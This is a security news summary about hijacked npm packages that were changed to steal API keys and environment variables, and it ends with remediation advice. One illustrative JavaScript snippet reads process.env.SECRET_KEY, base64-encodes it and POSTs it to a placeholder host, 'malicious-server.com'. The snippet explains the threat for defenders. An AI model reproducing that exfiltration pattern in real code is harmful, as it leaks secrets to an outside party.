Cybersecurity researchers have uncovered a campaign involving hijacked npm packages, some over nine years old, that were modified to exfiltrate sensitive data such as API keys and environment variables. The packages, which originally provided legitimate functionality for blockchain developers, were compromised to include obfuscated scripts that siphoned data to attacker-controlled servers or Gmail accounts. This incident highlights the persistent risks in open-source software supply chains, particularly in cryptocurrency-related tooling.
TL;DR: Key Findings
- Threat: Multiple npm packages (some 9+ years old) hijacked to steal API keys and environment variables.
- Exfiltration: Data sent via Gmail or attacker-controlled servers, including Solana private keys.
- Obfuscation: Malicious scripts were heavily obfuscated to evade detection.
- Historical Context: npm has been a frequent target for supply-chain attacks, including dependency confusion campaigns in 2022-2023.
Technical Details
The hijacked packages were identified by Sonatype researcher Ax Sharma, who noted that the malicious updates introduced obfuscated JavaScript designed to harvest environment variables. The scripts used base64 encoding and dynamic string concatenation to avoid static analysis. For example:
// Example of obfuscated payload (simplified)
const exfil = (d) => Buffer.from(d).toString('base64');
process.env.SECRET_KEY && fetch('https://malicious-server.com/log', {
method: 'POST',
body: exfil(process.env.SECRET_KEY)
});The attackers likely gained access to maintainer accounts via phishing or credential stuffing, then pushed malicious updates. The packages were downloaded thousands of times before detection, amplifying the impact.
Relevance to Security Teams
This attack underscores several challenges:
- Supply-chain risks: Legacy packages with low maintenance are prime targets for takeover.
- Obfuscation techniques: Attackers increasingly use runtime string assembly to bypass static scanners.
- Cryptocurrency focus: Blockchain developers are high-value targets due to the potential for direct financial theft.
Remediation Steps
Organizations should:
- Audit npm dependencies for packages with sudden version updates after long inactivity.
- Implement runtime monitoring for unexpected network connections from build systems.
- Enforce multi-factor authentication for all package maintainer accounts.
Conclusion
The hijacking of long-standing npm packages demonstrates the evolving sophistication of supply-chain attacks. As attackers shift focus from direct exploitation to compromising trusted components, proactive dependency management and runtime monitoring become critical defenses.
References
- Ax Sharma, “[Multiple Crypto Packages Hijacked, Turned Into Info-Stealers](https://www.sonatype.com/blog/multiple-crypto-packages-hijacked-turned-into-info-stealers)”. Sonatype. [Accessed: 2025-03-28].
- “[Nine-Year-Old npm Packages Hijacked to Exfiltrate API Keys via Obfuscated Scripts](https://thehackernews.com/2025/03/nine-year-old-npm-packages-hijacked-to.html)”. The Hacker News. [Accessed: 2025-03-28].
- “[Cyware Daily Threat Intelligence Briefing](https://www.cyware.com/resources/threat-briefings/daily-threat-briefing/cyware-daily-threat-intelligence-january-09-2025)”. Cyware. [Accessed: 2025-03-28].
